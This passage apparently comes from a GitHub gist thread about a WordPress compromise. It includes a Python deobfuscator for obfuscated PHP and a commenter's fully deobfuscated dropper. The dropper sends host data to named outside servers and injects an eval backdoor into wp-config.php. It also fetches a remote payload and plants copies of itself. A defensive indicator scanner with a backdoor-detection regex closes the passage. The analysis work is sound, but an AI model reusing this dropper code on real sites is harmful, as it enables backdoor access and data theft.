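$GLOBALS['_1_'] = Array(base64_decode('c3Ry' .'cG9z'),base64_decode('bW' .'Q1'));
function _2($i){
    $a=Array('aW5k' .'ZXgucGhw','','fA' .'==');
    return base64_decode($a[$i]);
}
while(round(0+1379.5+1379.5)-round(0+2759))$GLOBALS['_1_'][1]($x);
if($GLOBALS['_1_'][0](_2(0),_2(2))!==false)echo _2(1);
"""

LIT_CHAIN = re.compile(r"'[^']*'(?:\s*\.\s*'[^']*')+")
ROUND = re.compile(r"round\(([0-9.+\s]+)\)")
NAME_TABLE = re.compile(r"\$GLOBALS\['(\w+)'\]\s*=\s*Array\((.*?)\);", re.S)
STR_TABLE = re.compile(
    r"function\s+(\w+)\(\$\w+\)\s*\{\s*\$\w+\s*=\s*Array\((.*?)\);"
    r"\s*return\s+base64_decode\([^)]*\);\s*\}", re.S)

def _b64(text):
    return base64.b64decode(text).decode("utf-8", "replace")

def _quote(text):
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"

def join_literals(src):
    """'ab' .'cd' -> 'abcd' (heuristic: single-quoted literals without escapes)."""
    return LIT_CHAIN.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", src)

def fold_round(src):
    """round(0+a+b) -> integer; PHP rounds halves away from zero (inputs are >= 0)."""
    def fold(m):
        return str(math.floor(sum(float(t) for t in m.group(1).split("+")) + 0.5))
    return ROUND.sub(fold, src)

def deobfuscate(src):
    """Resolve both lookup tables statically; the PHP is never executed."""
    src = fold_round(join_literals(src))
    table = NAME_TABLE.search(src)
    if table:
        names = [_b64(b) for b in re.findall(r"base64_decode\('([^']*)'\)", table.group(2))]
        ref = re.compile(r"\$GLOBALS\['%s'\]\[(\d+)\]" % re.escape(table.group(1)))
        src = ref.sub(lambda m: names[int(m.group(1))], src.replace(table.group(0), ""))
    func = STR_TABLE.search(src)
    if func:
        strings = [_b64(s) for s in re.findall(r"'([^']*)'", func.group(2))]
        call = re.compile(r"\b%s\((\d+)\)" % re.escape(func.group(1)))
        src = call.sub(lambda m: _quote(strings[int(m.group(1))]), src.replace(func.group(0), ""))
    return src.strip()

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Once the constants are folded, the `while(2759-2759)` style loops and always-false `if` branches are visibly dead code and can be deleted by hand.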

@blast-hardcheese

blast-hardcheese commented Sep 4, 2016

I ended up getting hit by the same thing -- didn't notice until recently because the second half of the attack didn't take hold. I took a slightly different approach in reversal though, simplifying all the round(...) calls, and flattening the $GLOBALS and _1045629339 calls:

<?php
function l__0($_0)
{
    return urlencode(base64_encode(~$_0));
}
function l__1($_1)
{
    $_2[] = 'http://138.128.169.219/screenshots/.images/index.php';
    while (0)
        fgetcsv($_SERVER);
    $_2[] = 'http://kit4all.ru/components/com_jce/index.php';

    while (0)
        session_id($_1, $_3);
    $_3 = str_replace('wp-content/plugins/index.php', '', $_SERVER['REQUEST_URI']);
    $_4 = l__0($_SERVER['HTTP_HOST'] . $_3 . '|' . $_1);
    shuffle($_2);
    foreach ($_2 as $_5) {
        echo '<img width=1 height=1 src="' . $_5 . '?data=' . $_4 . '">';
        if (strpos('ufhpbedbwexa', 'fmz') !== false)
            file_exists($_SERVER, $_SERVER, $_6);
    }
}
@rename('../../wp-comments-post.php', '../../wp-commnets-post.php');
$_6 = '../../wp-config.php';
if (file_exists($_6)) {
    $_1 = substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', 16)), 0, 16);
    $_7 = md5($_1);
    $_5 = "error_reporting(0);if(isset(\$_REQUEST['wpspm']) && md5(\$_REQUEST['wpspm']) == '$_7' && isset(\$_REQUEST['wprk'])) eval ( base64_decode (\$_REQUEST['wprk']));";
    file_put_contents("$_6", str_replace('$table_prefix', "$_5 \n \$table_prefix", file_get_contents($_6)));
    if (strpos('wcooadotjiqukbdqlne', 'lz') !== false)
        substr_replace($_5, $_0, $_2);
}
l__1($_1);
@copy('http://dapchemeng.org/1/ar/wksonew.php', '../../wp-includes/template-wploader.php');
$$_6 = __FILE__;
@copy('index.php', '../upgrade/upgrades.php');
@copy('index.php', '../uploads/wp-uploads.php');
$_8 = 'i';
@file_put_contents('index.php', '<?php\n// Silence is golden.\n?>');
@file_put_contents('../uploads/index.php', 'index.php');
if (0 && array_sum($_3, $_4, $_4))
    dir($_4, $_0, $_3, $_3);
echo "192485097bc8a240a96aca5968eae777";
?>

Thanks for posting, it was nice to see someone else's approach
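
The deobfuscated dropper above leaves a fixed set of traces on disk, which makes it straightforward to check an install for them. The following is an added example, not code from the gist or from either commenter; it assumes the dropper ran as wp-content/plugins/index.php (inferred from the REQUEST_URI rewrite), so its `../../` paths resolve to the WordPress root, and the demo tree at the bottom is constructed.

```python
import re
from pathlib import Path

# Indicators read off the deobfuscated dropper above. Paths are relative to the
# WordPress root, assuming (from the REQUEST_URI rewrite) that the dropper ran
# as wp-content/plugins/index.php.
MARKER = "192485097bc8a240a96aca5968eae777"
DROPPED = [
    "wp-includes/template-wploader.php",
    "wp-content/upgrade/upgrades.php",
    "wp-content/uploads/wp-uploads.php",
    "wp-commnets-post.php",  # wp-comments-post.php after the rename
]
# Line injected into wp-config.php ahead of $table_prefix.
BACKDOOR = re.compile(
    r"\$_REQUEST\['wpspm'\].*eval\s*\(\s*base64_decode\s*\(\s*"
    r"\$_REQUEST\['wprk'\]")

def _read(path):
    try:
        return path.read_text(errors="replace")
    except OSError:
        return ""

def scan(root):
    """Return sorted (relative_path, reason) findings under a WordPress root."""
    root = Path(root)
    findings = set()
    for rel in DROPPED:
        if (root / rel).is_file():
            findings.add((rel, "file dropped or renamed by the dropper"))
    if not (root / "wp-comments-post.php").is_file():
        findings.add(("wp-comments-post.php", "core file missing (renamed away)"))
    if BACKDOOR.search(_read(root / "wp-config.php")):
        findings.add(("wp-config.php", "wpspm/wprk eval backdoor line"))
    if _read(root / "wp-content/uploads/index.php").strip() == "index.php":
        findings.add(("wp-content/uploads/index.php", "overwritten with 'index.php'"))
    for path in root.rglob("*.php"):
        if MARKER in _read(path):
            findings.add((path.relative_to(root).as_posix(), "contains the marker string"))
    return sorted(findings)

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:  # constructed sample tree
        root = Path(tmp)
        (root / "wp-content/uploads").mkdir(parents=True)
        (root / "wp-commnets-post.php").write_text("<?php\n")
        (root / "wp-content/uploads/index.php").write_text("index.php")
        (root / "wp-config.php").write_text(
            "<?php\nif(isset($_REQUEST['wpspm']) && isset($_REQUEST['wprk'])) "
            "eval ( base64_decode ($_REQUEST['wprk'])); \n $table_prefix = 'wp_';\n")
        for rel, reason in scan(root):
            print(f"{rel}: {reason}")
```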
